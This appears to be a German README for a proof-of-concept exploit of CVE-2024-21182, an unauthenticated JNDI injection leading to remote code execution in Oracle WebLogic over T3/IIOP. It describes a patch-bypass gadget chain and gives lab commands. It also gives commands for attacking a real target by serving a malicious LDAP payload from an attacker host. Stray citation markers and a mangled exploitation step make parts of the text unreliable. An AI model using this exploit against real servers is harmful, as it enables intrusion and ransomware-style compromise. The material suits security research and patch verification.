
Proof-of-Concept-Exploit für CVE-2024-21182, eine nicht authentifizierte JNDI-Injection, die zu Remote-Code-Ausführung in Oracle WebLogic Server über T3/IIOP-Protokolle führt. Enthält ein Docker-Labor zum Testen.
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182 ist eine nicht authentifizierte JNDI-Injection-Schwachstelle, die die Core-Komponente von Oracle WebLogic Server betrifft. Sie ermöglicht einem entfernten Angreifer über die Protokolle T3 oder IIOP die Ausführung beliebigen Codes (RCE) auf dem Server, wodurch vollständiger Zugriff auf alle Daten des Servers erlangt werden kann[citation:5][citation:8][citation:9].
Dieses Repository enthält einen funktionsfähigen Proof of Concept (PoC), der die erfolgreiche Umgehung des Patches für CVE-2023-21839 mithilfe der Gadget-Kette AggregatableOpaqueReference + MessageDestinationReference demonstriert[citation:2][citation:4].
| Attribut | Wert |
|---|---|
| CVE | CVE-2024-21182 |
| Produkt | Oracle WebLogic Server (Core) |
| Betroffene Versionen | 12.2.1.4.0 und 14.1.1.0.0[citation:7] |
| Verfügbarer Patch | Oracle Critical Patch Update (Juli 2024 und Oktober 2024)[citation:6] |
| Status in CISA KEV | Aktive Ausnutzung bestätigt (hinzugefügt am 01/06/2026)[citation:3][citation:8] |
| Mitigationsfrist (CISA) | 04/06/2026[citation:8] |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Phase 1: Aufklärung: Identifizieren von WebLogic-Servern mit exponierten T3/IIOP-Ports (7001).
Phase 2: Analyse: Feststellen, ob der Server eine verwundbare Version (12.2.1.4.0 oder 14.1.1.0.0) ausführt oder ob der Patch vom Oktober 2024 fehlt.
Phase 3: Ausnutzung (technischer Ablauf):
AggregatableOpaqueReference-Objekt[citation:2].referent des vorherigen Objekts so modifiziert, dass es auf eine bösartige MessageDestinationReference zeigt[citation:4].wlthint3client.jar (kann aus einer WebLogic-Installation extrahiert werden).# 1. Clonar el repositorio
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Iniciar el laboratorio (víctima + atacante)
docker-compose up -d
# 3. Ejecutar la explotación automática
./validate.sh
Ausnutzung gegen ein reales (autorisiertes) Ziel
# 1. Iniciar el servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py
# 2. En otra terminal, ejecutar el payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
Aktueller Status laut CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Aber in der Regel ja, RCEs in Middleware sind ein anfänglicher Vektor bei Ransomware-Intrusionen).
Dieser Code dient ausschließlich Bildungs- und Forschungszwecken. Die missbräuchliche Verwendung dieses PoC gegen Systeme ohne ausdrückliche Genehmigung ist illegal. Der Autor übernimmt keine Haftung für den Missbrauch dieser Informationen.